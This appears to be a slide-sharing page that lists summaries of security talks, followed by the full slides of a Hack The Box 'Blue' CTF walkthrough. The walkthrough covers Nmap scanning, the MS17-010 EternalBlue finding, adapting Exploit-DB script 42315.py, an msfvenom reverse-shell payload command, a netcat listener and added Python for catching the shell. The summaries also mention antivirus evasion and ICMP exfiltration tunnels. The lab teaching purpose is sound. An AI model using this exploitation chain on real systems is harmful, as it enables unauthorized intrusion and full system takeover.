- Diana Whitney is an IT security specialist who has worked at EWA-Canada since 2015 in their payment assurance lab testing PCI standards. She holds CySA+ and PenTest+ certifications.
- An initial Nmap scan was run on 10.10.10.40 to discover open ports and services. This revealed ports 139, 445, 135, and 49152-7 were open, indicating SMB services.
- Further Nmap scripts identified the host OS as Windows 7 Pro and its security mode. Scanning all 65535 ports found additional open ports.
- Nmap vulnerability scripts detected a positive result for CVE-2017-0143, the EternalBlue SMB exploit.
- Searchsploit was used
Quick talk on how to leverage scapy-ssl_tls to perform TLS 1.3 testing. Covers which areas of the stack are less vulnerable with TLS 1.3 as opposed to 1.2.
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics - Bishop Fox
Learn the basics of network penetration testing success - an introduction to the top three tools that will help you on your security journey: Nmap, Netcat, and Metasploit. See how to use Nmap both for port scanning and vulnerability discovery. You'll also learn how to use Netcat to grab banners, make HTTP requests, and create both reverse and bind shells. Finally, we’ll learn the ins and outs of Metasploit, including how to integrate our Nmap scan results for even more ownage and using the built-in exploits to get shells.
At the end of this, you will be port scanning, creating payloads, and popping shells. This technical workshop is designed to familiarize you with the necessary tools to continue your ethical hacking journey. From here, take your l33t new skillz and apply them to Capture The Flag (CTF) competitions or scanning your home network for vulnerabilities.
(This was originally presented on February 22, 2010 at Day of Shecurity Boston 2019).
This document summarizes a presentation about pentesting custom TLS stacks. It discusses using the scapy-ssl_tls tool to craft and analyze TLS packets in order to evaluate the security of custom TLS implementations. The presentation covers TLS protocol basics, features of scapy-ssl_tls like packet parsing and crypto hooks, and techniques for analyzing areas like supported versions/ciphers, the TLS state machine, Diffie-Hellman parameters, side channels, fragmentation, and more. It aims to provide a way to efficiently reproduce TLS attacks and help test responses to vulnerabilities.
BSides Rochester 2018: Esteban Rodriguez: Ducky In The Middle: Injecting keys... - JosephTesta9
This document summarizes Esteban Rodriguez's talk on injecting keystrokes into plaintext protocols. It discusses how protocols like VNC, HippoRemote, and early versions of Synergy sent keystrokes in plaintext, allowing them to be intercepted using tools like Wireshark. It then demonstrates how intercepted keystrokes could be cracked, monitored, or injected using tools like Metasploit, custom Python scripts, and rogue Synergy servers implemented with Dissonance. Mitigations discussed include encrypting protocols with SSL and verifying server fingerprints. The overall message is that encryption is important and security research helps improve protocols.
Nmap not only a port scanner by ravi rajput comexpo security awareness meet - Ravi Rajput
As every coin has two sides, in the same way we know only a single side of Nmap, which is port scanning.
While researching I found that a lot more than port scanning and banner grabbing can be done with the use of Nmap.
We can use Nmap for web application pen-testing and exploitation too. Yeah, it won't work as efficiently as MSF.
This can replace the use of Acunetix and other paid scanners.
Joseph Salowey, Tableau Software
Transport Layer Security (TLS) 1.3 is almost here. The protocol that protects most of the Internet's secure connections is getting its biggest ever revamp, and is losing a round-trip. We will explore the differences between TLS 1.3 and previous versions in detail, focusing on the performance and security improvements of the new protocol as well as some of the challenges we face around securely implementing new features such as 0-RTT resumption.
- Laverna is a note taking application that stores encrypted notes locally in the browser using JavaScript rather than on a remote server.
- It uses Markdown formatting and encrypts notes using PBKDF2 before optionally syncing them to services like RemoteStorage.io or Dropbox.
- To use Laverna, it must be cloned from GitHub and built using Node.js, bower, and grunt with encryption handled entirely by the client side application.
Mixing performance, configurability, density, and security at scale has, historically, been hard with PHP. Early approaches have involved CGIs, suhosin, or multiple Apache instances. Then came PHP-FPM. At Pantheon, we've taken PHP-FPM, integrated it with cgroups, namespaces, and systemd socket activation. We use it to deliver all of our goals at unheard-of densities: thousands and thousands of isolated pools per box.
Watch how it's configured and see PHP-FPM pools start real-time to serve different Drupal sites as requests come into a server.
All of our tools for this are open-source and usable on your own virtual machines and hardware.
BSides LV 2016 - Beyond the tip of the iceberg - fuzzing binary protocols for...Alexandre Moneger
This presentation shows that code coverage guided fuzzing is possible in the context of network daemon fuzzing.
Some fuzzers are blackbox while others are protocol aware. Even for the protocol-aware ones, fuzzer writers typically model the protocol specification and implement packet-awareness logic in the fuzzer. Unfortunately, just because the fuzzer is protocol aware does not guarantee that sufficient code paths have been reached.
The presentation deals with specific scenarios where the target protocol is completely unknown (proprietary) and no source code or protocol specs are accessible. The tool developed builds a feedback loop between the client and the server components using the concept of "gate functions". A gate function triggers monitoring. The pintool component tracks the binary code coverage for all the functions until it reaches an exit gate. By instrumenting such gated functions, the tool is able to measure code coverage during packet processing.
The document provides instructions for setting up an OpenVPN server to allow both Linux and Mac OS X clients to securely connect. It describes generating certificates and keys, configuring the OpenVPN server, and then configuring Linux and Mac OS X clients to connect to the server. The key steps are:
1) Generate certificates and keys on the server using the OpenVPN easy-rsa scripts.
2) Configure the OpenVPN server configuration file and required files.
3) Distribute client certificates to Linux and Mac clients and configure the clients.
4) Start the OpenVPN server and test connectivity between clients and the server network.
This document discusses using ICMP tunneling to covertly transmit SSH traffic between two machines without detection. It provides instructions for setting up an ICMP tunnel using the hans tool, capturing traffic before and after establishing the tunnel, and comparing the captures to see how the SSH traffic is now encapsulated in ICMP packets instead of using TCP port 22. The main objective is to demonstrate how a benign protocol like ICMP can be abused to exfiltrate data without detection by encapsulating other protocols within it.
1. The document discusses TLS session resumption across multiple servers using ngx_lua. It introduces TLS handshakes and session resumption.
2. It describes how ngx_lua can implement cross-host session resumption via session IDs and tickets through Lua scripts while maintaining performance and forward secrecy. Small patches are needed to Nginx/OpenSSL.
3. Key aspects covered are a memcached session store interface, non-blocking I/O, ticket key encryption and rotation, and configuration via Lua scripts without modifying Nginx core. This allows cross-host session resumption compatible with TLSv1.3.
Nmap is a security scanning tool that can discover open ports, scan for services, and determine operating systems on a network. It works by sending packets to IP addresses and analyzing the responses to infer information about the target system, such as which ports are open or closed and what services are running. Nmap displays this information to the user and can be run from both graphical and command line interfaces on many operating systems. While useful for security auditing, Nmap could also enable hacking if used without permission on a network.
The document discusses DHCP security spoofing vs snooping. DHCP snooping is a method used on switches to prevent DHCP spoofing attacks by monitoring DHCP packets and building a DHCP snooping binding database to ensure only authorized DHCP servers can respond to requests. The document provides configuration examples for enabling DHCP snooping on a switch and designating trusted ports.
CSW2017 Qiang li zhibinhu_meiwang_dig into qemu security - CanSecWest
The document summarizes a presentation on analyzing the security of QEMU. It introduces QEMU and describes its main attack surfaces, including device emulation, virtio, third-party libraries, VNC, Spice, and QMP. Examples of vulnerabilities found in Cirrus VGA, virtio filesystem, virglrenderer library, VNC, and QMP are provided. The document concludes with thoughts on efficient security analysis, noting that combining in-depth knowledge with fuzzing is most effective for finding bugs in complex software like QEMU.
This document summarizes a presentation on evading antivirus detection. It discusses how antivirus has gotten better at detecting old techniques, and introduces newer tools and methods for generating payloads that can bypass antivirus software, including Veil, Hyperion, and writing your own custom stagers and payloads. It also recommends building your own antivirus lab to reliably test new payloads before deployment.
This document provides an overview and agenda for a training on the Nmap Scripting Engine (NSE). It begins with a 10 minute introduction to Nmap, covering what Nmap is used for and some basic scan options. Next, it spends 20 minutes reviewing the existing NSE script categories and how to use available scripts, demonstrating two sample scripts. Finally, it dedicates 20 minutes to explaining how to write your own NSE script, including the basic structure and providing an example of writing a script to find the website title.
For a college course -- CNIT 141: Cryptography for Computer Networks, at City College San Francisco
Based on "Serious Cryptography: A Practical Introduction to Modern Encryption", by Jean-Philippe Aumasson, No Starch Press (November 6, 2017), ISBN-10: 1593278268 ISBN-13: 978-1593278267
Instructor: Sam Bowne
More info: https://samsclass.info/141/141_S19.shtml
Nmap is a network scanning tool that can discover hosts and services on a network. It can scan TCP and UDP ports, perform OS and version detection, and has both command line and GUI interfaces. Nmap allows specification of target hosts by IP address, CIDR notation for subnets, or hostname. It provides information about open ports and common services, and can detect vulnerabilities.
The document describes XenTT, a tool for deterministic replay in the Xen virtualization platform. XenTT records the execution history of a guest VM, including nondeterministic events like interrupts and I/O. It then replays the execution deterministically to allow for repeatable systems analysis. This is done by making the CPU and execution environment deterministic during replay and precisely recording the timing and location of nondeterministic events during the original run.
Last mile authentication problem: Exploiting the missing link in end-to-end s... - Priyanka Aash
With a "Trust none over the Internet" mindset, securing all communication between a client and a server with protocols such as TLS has become a common practice. However, while communication over the Internet is routinely secured, there is still an area where such security awareness is not seen: inside individual computers, where adversaries are often not expected.
This talk discusses the security of various inter-process communication (IPC) mechanisms that local processes and applications use to interact with each other. In particular, we show IPC-related vulnerabilities that allow a non-privileged process to steal passwords stored in popular password managers and even second factors from hardware tokens. With passwords being the primary way of authentication, the insecurity of this "last mile" causes the security of the rest of the communication strands to be obsolete. The vulnerabilities that we demonstrate can be exploited on multi-user computers that may have processes of multiple users running at the same time. The attacker is a non-privileged user trying to steal sensitive information from other users. Such computers can be found in enterprises with centralized access control that gives multiple users access to the same host. Computers with guest accounts and shared computers at home are similarly vulnerable.
Network Scanning Phases and Supporting Tools - Joseph Bugeja
This presentation focuses on the network penetration scanning phase. It introduces tools and techniques that professional pen-testers and ethical hackers need to master to find target machines, openings on those targets and vulnerabilities.
The slide deck contains network penetration testing requirements and tools used in real-world pentesting. For demo purposes, I used a VulnHub machine called Metasploitable 2 for testing, looking into various port and service vulnerabilities using Kali open-source tools.
Network scanning with Nmap for Noobs and Ninjas - This slide was presented at Null Delhi monthly security meet by Nikhil and Jayvardhan.
https://www.facebook.com/nullOwaspDelhi/
The document discusses using Nmap to perform network scanning and reconnaissance. It provides an overview of Nmap, describing common scan types like TCP and UDP scans. It also covers useful Nmap options for tasks like service and operating system detection. The document demonstrates the Nmap Scripting Engine for tasks like vulnerability scanning and brute force attacks. It provides examples of commands for different scan types and scripts.
Title: Hands on Penetration Testing 101 by Scott Sutherland & Karl Fosaaen
Abstract: The goal of this training is to introduce attendees to standard penetration test methodologies, tools, and techniques. Hands on labs will cover the basics of asset discovery, vulnerability enumeration, system penetration, privilege escalation, and bypassing end point protection. During the labs, common vulnerabilities will be leveraged to illustrate attack techniques, using freely available tools such as Nmap and Metasploit. This training will be valuable to anyone interested in gaining a better understanding of penetration testing or to system administrators trying to understand common attack approaches.
Empower yourself to see what's lurking on your network with our Nmap project presentation! This presentation delves into the world of port scanning with Nmap, the industry-standard tool. Explore how Nmap works, uncover different scanning techniques (SYN scan, UDP scan, etc.), and learn to identify open ports, potential vulnerabilities, and running services. Whether you're a network administrator, security professional, or simply curious about your network traffic, this presentation equips you with the skills to gain valuable insights into your network health. Visit us for more nmap project presentations, https://bostoninstituteofanalytics.org/cyber-security-and-ethical-hacking/
This document provides an overview of advanced scanning and exploitation techniques for security testing. It discusses using Nmap to scan for open ports and operating systems. The importance of local IP sweeping to find vulnerable systems on a local network is explained. Netcat is demonstrated as a simple way to create a remote shell on another system. Brief examples of shellcode and exploits that can be delivered through media files like JPGs and MP3s are also provided. The conclusion emphasizes that while this information is shown for educational purposes, actually exploiting systems without permission would be illegal.
Shmoocon Epilogue 2013 - Ruining security models with SSH - Andrew Morris
This document summarizes how SSH can be used to compromise security in several ways:
1. Authentication can be bypassed by generating a public key on an attacker's machine and transferring it to a victim's machine to allow code execution without a password.
2. SSH allows file transfer and traffic tunneling which can be used to transfer tools, exfiltrate data, and bypass firewalls by tunneling any protocol over an SSH connection.
3. Dynamic tunneling with tools like SOCKS and Proxychains allows running scans, exploits, and other tools through an SSH connection without needing privileged access on the target.
This document discusses techniques for hunting bad guys on networks, including identifying client-side attacks, malware command and control channels, post-exploitation activities, and hunting artifacts. It provides examples of using DNS logs, firewall logs, HTTP logs, registry keys, installed software inventories, and the AMCache registry hive to look for anomalous behaviors that could indicate security compromises. The goal is to actively hunt for threats rather than just detecting known bad behaviors.
Chuck McAuley, Ixia Communications
The Mirai botnet has brought public awareness to the danger of poorly secured embedded devices. Its ability to propagate is fast and reliable. Its impact can be devastating and variants of it will be around for a long time. You need to identify it, stop it, and prevent its spread. I had the opportunity to become familiar with the structure, design, and weaknesses of Mirai and its variants. At this talk you'll learn how to detect members of the botnet, mess with them through various means and setup a safe live fire lab environment for your own amusement. I will demonstrate how to join a C2 server, how to collect new samples for study, and some changes that have occurred since release of the source code. By the end you'll be armed and ready to take the fight to these jerks. Unless you're a botnet operator. Then you'll learn about some of the mistakes you made.
This document provides an overview of Nmap Scripting Engine (NSE) for security researchers looking to build NSE scripts. It covers the anatomy of an NSE script including required components like metadata, categories, portrules and actions. It also provides tips for scriptors like specifying the script directory, using debugging mode, and updating the script database. The goal is to provide a kickstart for researchers to learn how to create NSE scripts and proofs-of-concept.
Nmap (Network Mapper) is an open-source utility that can quickly scan broad ranges of devices and provide valuable information about the devices on your network. It can be used for IT auditing and asset discovery as well as security profiling of the network.
The document discusses various phases of intrusion and techniques used by attackers:
1. Reconnaissance involves gathering information about the target through techniques like searching public databases, domain name records, and social engineering to map the network and discover vulnerabilities.
2. Scanning detects live machines, network topology, firewall configurations, applications, and vulnerabilities using tools like ping sweeps, traceroute, port scanning, and vulnerability scanners.
3. Gaining access exploits known vulnerabilities through buffer overflow attacks or by downloading exploits from hacker sites to compromise systems.
A penetration test involves four main phases: reconnaissance, scanning, exploitation, and maintaining access. In the reconnaissance phase, tools are used to gather information about the target system without authorization. Scanning identifies open ports and vulnerabilities. Exploitation attempts to gain unauthorized control of systems by exploiting vulnerabilities, such as using password crackers. Maintaining access involves creating backdoors for future unauthorized access, such as using network sniffing tools or installing rootkits. Popular tools used in penetration tests include Nmap for scanning, Metasploit for exploitation, and Netcat for creating backdoors. Defending against penetration tests requires monitoring information published online, properly configuring firewalls and access controls, patching systems, and using antivirus and intrusion detection software.
As organizations assess the security of their information systems, the need for automation has become more and more apparent. Not only are organizations attempting to automate their assessments, the need is becoming more pressing to perform assessments centrally against large numbers of enterprise systems. Penetration testers can use this automation to make their post-exploitation efforts more thorough, repeatable, and efficient. Defenders need to understand the techniques attackers are using once an initial compromise has occurred so they can build defenses to stop the attacks. Microsoft's PowerShell scripting language has become the de facto standard for many organizations looking to perform this level of distributed automation. In this presentation James Tarala, of Enclave Security, will describe to students the enterprise capabilities PowerShell offers and show practical examples of how PowerShell can be used to perform large scale penetration tests of Microsoft Windows systems.
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...idsecconf
The document discusses exploiting vulnerabilities in wireless routers that have USB ports for sharing storage and printers. It describes conducting attacks against a D-Link wireless router to steal data, delete data, and implant backdoors by accessing the shared USB flash drive and printer through the router's vulnerable SharePort technology. The attacker scans the wireless network, identifies the router and connected USB devices, and then explores ways to hack into the shared resources and conduct unauthorized activities.
Scanning is the first phase of active hacking used to locate target systems and networks. It involves identifying live hosts, open ports, services, and OS details through techniques like ping sweeps, port scanning, banner grabbing, and vulnerability scanning. Enumeration occurs after scanning and is used to extract additional information like usernames, shares, and services. Specific enumeration techniques discussed include SNMP enumeration, which identifies device information by querying SNMP agents, and NetBIOS enumeration, which extracts Windows account and share details. Hacking tools mentioned that assist with scanning and enumeration include Nmap, SNMPUtil, DumpSec, and Hyena.
The document provides instructions on how to configure an SSH server on Linux, perform footprinting and reconnaissance, scanning tools and techniques, enumeration tools and techniques, password cracking techniques and tools, privilege escalation methods, and keylogging and hidden file techniques. It discusses active and passive footprinting, Nmap port scanning, NetBIOS and SNMP enumeration, Windows password hashes, the sticky keys method for privilege escalation, ActualSpy keylogging software, and hiding files using NTFS alternate data streams. Countermeasures for many of these techniques are also outlined.
This document discusses encrypting volumes with Barbican in OpenStack. It provides an introduction to Barbican and encryption, describes how Barbican works with Nova and Cinder to provide transparent encryption of volumes using LUKS, discusses some issues the presenter encountered integrating Barbican on OnRamp's private cloud and how they were resolved, and limitations to be aware of when using encrypted volumes. It concludes with a demo and Q&A.
DEF CON 23 - Rickey Lawshae - lets talk about soapFelipe Prado
This document discusses the Universal Plug and Play (UPnP) protocol and Simple Object Access Protocol (SOAP). It provides an overview of UPnP including discovery, description of devices and services, control of services via SOAP calls, and potential security issues. While UPnP aims to allow smart devices to easily communicate, the document notes that many devices have limited security which can lead to issues like command injection attacks.
What do a Lego brick and the XZ backdoor have in common? (Speck&Tech)
ABSTRACT: At first glance, a Lego brick and the XZ backdoor might have in common the fact that both are building blocks, or dependencies, of creative and software projects. The reality is that a Lego brick and the XZ backdoor case have much more in common than that.
Join the presentation to dive into a story of interoperability, standards and open formats, and then discuss the important role contributors play in a sustainable open source community.
BIO: Advocate of free software and of standard, open formats. She has been an active member of the Fedora and openSUSE projects and co-founded the LibreItalia association, where she was involved in several events, migrations and training activities related to LibreOffice. Previously she worked on LibreOffice migrations and training courses for several public administrations and private companies. Since January 2020 she has worked at SUSE as a Software Release Engineer for Uyuni and SUSE Manager, and when she is not following her passion for computers and for Geeko she cultivates her curiosity about astronomy (from which her nickname deneb_alpha derives).
Nous Sommes Cyber - HTB Blue
1. WE ARE CYBER/NOUS SOMMES CYBER
MONTREAL 2019
PRESENTED BY DIANA WHITNEY
HTB: BLUE
2. WHOAMI
• Diana Whitney
• IT Security Specialist at EWA-Canada since 2015
• Payment Assurance Lab – PCI PTS POI Standards testing
• Secure That Cert! CySA+ and PenTest+
3. WHAT WILL WE COVER?
• Quick intro to Hack the Box and the Blue machine
• Reconnaissance
• Vulnerability Identification
• Exploitation
• Walkthrough demo
4. • https://www.hackthebox.eu/
• Deliberately vulnerable machines
• Each one has a unique exploit – test your skills against it
• CVEs
• Enumeration
• Real-Life
• CTF-Like
• Custom Exploitation
6. RECONNAISSANCE
• Gather information about our target
• Open ports – TCP and UDP
• Service identification
• Operating System
• Service/OS Versions
• We will be using Nmap
7. NMAP
• Free but powerful tool
• Host discovery
• Network mapping
• Port scanning
• Version and OS detection
• Customizable scans using Nmap Scripting Engine (NSE)
• Command line and GUI (Zenmap) versions
• Many cheat sheets are available online
8. RECON WITH NMAP
• nmap -sC -sV -O -oA initial 10.10.10.40
• -sC scans the target using the default Nmap scripts
• -sV attempts to identify the version of the services found running on open ports
• -O attempts to identify the host's operating system
• -oA writes the results in all three output formats, using 'initial' as the base name (initial.nmap, initial.gnmap, initial.xml)
• 10.10.10.40 is our target
9. • Port 139 is open and running netbios-ssn
• Port 445 is running Microsoft-ds
• Ports 135, 49152-7 are running msrpc
10. The default scripts (smb-os-discovery and smb-security-mode) talked SMB to the open ports to learn more about the host:
• OS – Windows 7 Pro
• Security mode (SMB message signing settings)
11. MORE NMAP
• Initial scan only scans the top 1000 ports
• Adding -p- to the command tells nmap to scan all 65535 ports
• To scan UDP ports instead of TCP ports
• nmap -sU -O -p- -oA udpfull 10.10.10.40
12. NMAP VULNERABILITY SCRIPTS
• nmap --script vuln -oA vulnerabilities -p 139,445 10.10.10.40
• The previous scan used Nmap's default scripts, which are fast and non-invasive
• The scripts in the vuln category check the open ports for known, exploitable vulnerabilities
• They can be very slow, so restrict them to specific ports using -p
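The scans above leave three files behind; the grepable one (initial.gnmap) is the easiest to feed into the next step. The following Python is an added example, not code from the slides or from Nmap: it parses a constructed piece of grepable output shaped like the Blue results, pulls out the open ports with their identified services and the OS guess, and builds the targeted --script vuln command so that the slow vulnerability scripts only hit the SMB ports. The sample scan text, PortInfo, parse_gnmap, smb_ports, os_guess and vuln_scan_command are all this example's own names.

```python
import re
from typing import Dict, List, NamedTuple, Optional


class PortInfo(NamedTuple):
    port: int
    proto: str
    state: str
    service: str
    version: str


# Constructed sample of initial.gnmap (the grepable file that -oA initial writes
# next to initial.nmap and initial.xml), shaped after the Blue results in the
# slides; not real captured output.
SAMPLE_GNMAP = (
    "# Nmap 7.70 scan initiated as: nmap -sC -sV -O -oA initial 10.10.10.40\n"
    "Host: 10.10.10.40 ()\tStatus: Up\n"
    "Host: 10.10.10.40 ()\tPorts: "
    "135/open/tcp//msrpc//Microsoft Windows RPC/, "
    "139/open/tcp//netbios-ssn//Microsoft Windows netbios-ssn/, "
    "445/open/tcp//microsoft-ds//Windows 7 Professional 7601 Service Pack 1 "
    "microsoft-ds (workgroup: WORKGROUP)/, "
    "49152/open/tcp//msrpc//Microsoft Windows RPC/, "
    "49153/open/tcp//msrpc//Microsoft Windows RPC/, "
    "49154/open/tcp//msrpc//Microsoft Windows RPC/, "
    "49155/open/tcp//msrpc//Microsoft Windows RPC/, "
    "49156/open/tcp//msrpc//Microsoft Windows RPC/, "
    "49157/open/tcp//msrpc//Microsoft Windows RPC/"
    "\tIgnored State: closed (991)\tOS: Windows 7 Professional SP1\n"
    "# Nmap done -- 1 IP address (1 host up) scanned\n"
)

HOST_RE = re.compile(r"^Host: (\S+) \(")
PORTS_RE = re.compile(r"\tPorts: ([^\t]*)")
OS_RE = re.compile(r"\tOS: ([^\t]*)")
SMB_SERVICES = {"netbios-ssn", "microsoft-ds"}


def parse_gnmap(text: str) -> Dict[str, List[PortInfo]]:
    """Return {host: [PortInfo, ...]} for every Host: line in grepable output.
    Each port entry is port/state/proto/owner/service/rpcinfo/version/; Nmap
    writes any '/' inside the version string as '|', so splitting on '/' is safe."""
    hosts: Dict[str, List[PortInfo]] = {}
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue
        entries = hosts.setdefault(m.group(1), [])
        pm = PORTS_RE.search(line)
        if not pm:
            continue  # e.g. the "Status: Up" line carries no Ports: field
        for entry in pm.group(1).split(", "):
            f = entry.split("/")
            entries.append(PortInfo(int(f[0]), f[2], f[1], f[4], f[6]))
        entries.sort(key=lambda p: (p.proto, p.port))
    return hosts


def open_ports(hosts: Dict[str, List[PortInfo]], host: str, proto: str = "tcp") -> List[int]:
    return [p.port for p in hosts.get(host, []) if p.proto == proto and p.state == "open"]


def smb_ports(hosts: Dict[str, List[PortInfo]], host: str) -> List[int]:
    """Open ports whose identified service is SMB/NetBIOS session: the ones worth
    the slow --script vuln pass (smb-vuln-ms17-010 lives in that category)."""
    return [p.port for p in hosts.get(host, [])
            if p.state == "open" and p.service in SMB_SERVICES]


def os_guess(text: str, host: str) -> Optional[str]:
    """The -O result, if Nmap recorded one for this host."""
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m and m.group(1) == host:
            om = OS_RE.search(line)
            if om:
                return om.group(1)
    return None


def vuln_scan_command(host: str, ports: List[int], outbase: str = "vulnerabilities") -> str:
    """The follow-up command from the slides, restricted to the ports that matter."""
    plist = ",".join(str(p) for p in sorted(set(ports)))
    return f"nmap --script vuln -p {plist} -oA {outbase} {host}"


if __name__ == "__main__":
    found = parse_gnmap(SAMPLE_GNMAP)
    print("open tcp ports:", open_ports(found, "10.10.10.40"))
    print("os guess:", os_guess(SAMPLE_GNMAP, "10.10.10.40"))
    print(vuln_scan_command("10.10.10.40", smb_ports(found, "10.10.10.40")))
```

On a real engagement the same parser runs over the -p- and -sU results as well; anything that shows up as a new open port there gets added to the vuln-scan port list rather than re-running the whole category against every port.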
13. • Script smb-vuln-ms17-010 returned a positive result
• Remote code execution vulnerability in Microsoft SMBv1 servers
• MS17-010 is the Microsoft bulletin; it covers CVE-2017-0143 through CVE-2017-0148. The Nmap script reports CVE-2017-0143, and the EternalBlue exploit itself is tracked as CVE-2017-0144
14. • Developed by the NSA and leaked by the Shadow Brokers hacker group in 2017
• Exploits SMBv1, a protocol that allows Windows-based computers on a local network to share files easily
• Allows a remote attacker to execute arbitrary code on a vulnerable machine by sending specially crafted packets
• Used in the WannaCry and NotPetya ransomware attacks of 2017
• MS17-010 / CVE-2017-0143
15. AWESOME, LET'S EXPLOIT IT!
• Search for available, 'pre-made' exploits
• ExploitDB - https://github.com/offensive-security/exploitdb
• Git repository of exploits maintained by Offensive Security
• Searchsploit is a command line search tool for Exploit-DB
• Search the available exploits based on the vulnerability's ID
18. LET'S EXAMINE THE CONTENTS OF 42315.PY…
• The script imports a helper module, mysmb, that is not shipped with it
• The script header gives a URL for it; fetch it with wget
19. • wget saves the download as 42315.py.1, since we already have a 42315.py
• Rename it so the import resolves:
• mv 42315.py.1 mysmb.py
20. • The script needs SMB credentials in order to exploit the target
• We look for them using enum4linux
• Since enum4linux gets a session with no username and no password, we can assume this machine allows a null session and leave the script's credentials empty
21. • Last we need to modify the Python code to add a payload
• This will be the executable file we send to the target machine and have it run
• To gain access to the target, we'll send a payload that connects back to us with a reverse shell
• Generate the payload using MSFVenom
22. • msfvenom -p windows/shell_reverse_tcp -f exe LHOST=10.10.14.x LPORT=4444 > eternalblue.exe
• https://redteamtutorials.com/2018/10/24/msfvenom-cheatsheet/
• -p – our payload – windows/shell_reverse_tcp, a single-stage cmd.exe shell that connects back to LHOST:LPORT
• -f – output format – exe
• LHOST – the IP address of our attack machine (local host) on the lab VPN, 10.10.14.x (10.10.14.7 in this demo)
• Your IP address can be found on the HTB 'Access' page, or by running ifconfig
• LPORT – a port on our machine – we'll use 4444 since it's unlikely to be in use for anything else
• eternalblue.exe – the executable file generated by this command
23. • Alter the script to send eternalblue.exe from its location on the attack machine to the target machine
• The script will then execute eternalblue.exe on the target machine
24. • Use Netcat to set up a listener on the attacking machine
• nc -nvlp 4444
• The attack machine is now listening for an incoming connection from the target machine
• Now run the Python script
• python 42315.py 10.10.10.40
25. When the Python script runs successfully, the reverse shell connection is received by the attack machine. We now have access to the target. Run 'whoami' in the shell. No privilege escalation required – EternalBlue has granted us system access.
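What nc -nvlp 4444 is doing while the exploit runs, written out as an added Python example rather than code from the slides or from Netcat: ShellCatcher binds the local port (-l, -p), accepts one inbound connection, reports the peer by address without a DNS lookup (-v, -n), and then relays bytes between the terminal and the remote cmd.exe. The expected_peer check is this example's own addition: on a shared lab VPN it closes connections that did not come from the target and keeps waiting. simulate_target is a constructed loopback stand-in for the payload connecting back, so the block runs offline; the banner it sends is made up. ShellCatcher, wait, simulate_target and relay are this example's names, not Netcat's.

```python
import socket
import sys
import threading
from typing import Optional, Tuple


class ShellCatcher:
    """Stand-in for `nc -nvlp PORT`: -l listen, -p local port, -v report the
    peer, -n never resolve the peer's name (only its address is ever printed)."""

    def __init__(self, bind_addr: str = "0.0.0.0", port: int = 4444) -> None:
        self.srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.srv.bind((bind_addr, port))
        self.srv.listen(1)
        self.port = self.srv.getsockname()[1]  # the real port when 0 was requested

    def wait(self, expected_peer: Optional[str] = None, timeout: float = 60.0
             ) -> Optional[Tuple[Tuple[str, int], bytes, socket.socket]]:
        """Accept one connection; return ((ip, port), first_bytes, conn), or None
        if nothing acceptable arrives within `timeout` seconds.
        With expected_peer set, connections from any other address are closed and
        the listener keeps waiting, so a stray connection from another box on the
        lab VPN cannot land in this session."""
        self.srv.settimeout(timeout)
        try:
            while True:
                try:
                    conn, peer = self.srv.accept()
                except socket.timeout:
                    return None
                if expected_peer is not None and peer[0] != expected_peer:
                    conn.close()  # not our target; keep listening
                    continue
                conn.settimeout(timeout)
                try:
                    # For windows/shell_reverse_tcp this is cmd.exe's banner.
                    first = conn.recv(4096)
                except socket.timeout:
                    first = b""
                return peer, first, conn
        finally:
            self.srv.close()  # one shell per listener, as with nc -l


def simulate_target(port: int, banner: bytes, host: str = "127.0.0.1") -> threading.Thread:
    """Constructed loopback stand-in for eternalblue.exe connecting back; only
    here so the example can be exercised without a target."""
    def run() -> None:
        try:
            with socket.create_connection((host, port), timeout=5) as s:
                s.sendall(banner)
        except OSError:
            pass  # the listener rejected us: the expected_peer path
    t = threading.Thread(target=run, daemon=True)
    t.start()
    return t


def relay(conn: socket.socket) -> None:
    """Shuttle bytes between our terminal and the remote shell, as nc does."""
    conn.settimeout(None)

    def pump_in() -> None:
        for line in sys.stdin:
            conn.sendall(line.encode())

    threading.Thread(target=pump_in, daemon=True).start()
    while True:
        data = conn.recv(4096)
        if not data:
            break
        sys.stdout.write(data.decode(errors="replace"))
        sys.stdout.flush()


if __name__ == "__main__":
    catcher = ShellCatcher("0.0.0.0", 4444)
    print(f"listening on 0.0.0.0:{catcher.port}")
    got = catcher.wait(expected_peer="10.10.10.40")  # the Blue target from the slides
    if got is None:
        sys.exit("no connection from the target")
    peer, first, conn = got
    print(f"connection from {peer[0]}:{peer[1]}")
    sys.stdout.write(first.decode(errors="replace"))
    relay(conn)
```

Start it before running 42315.py, exactly as with the nc listener; the whoami check from the slide is then just the first command typed into the relayed shell.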
Enum4linux is a reconnaissance tool for enumerating information from Windows and Samba systems.
• -a does all simple enumeration: user lists, password policy information, group and member lists, OS information
• Cheat sheets
MSFVenom is a powerful tool for payload generation and encoding.
We sent our victim an executable that, when run on the target, connects back to our machine and hands us a shell.
We need to make sure our machine is listening on the port we put into the payload (LPORT).
• -n – no DNS lookups on the other machine's address
• -v – verbose; informs us of a successful connection
• -l – listen for an inbound connection instead of connecting out
• -p – local port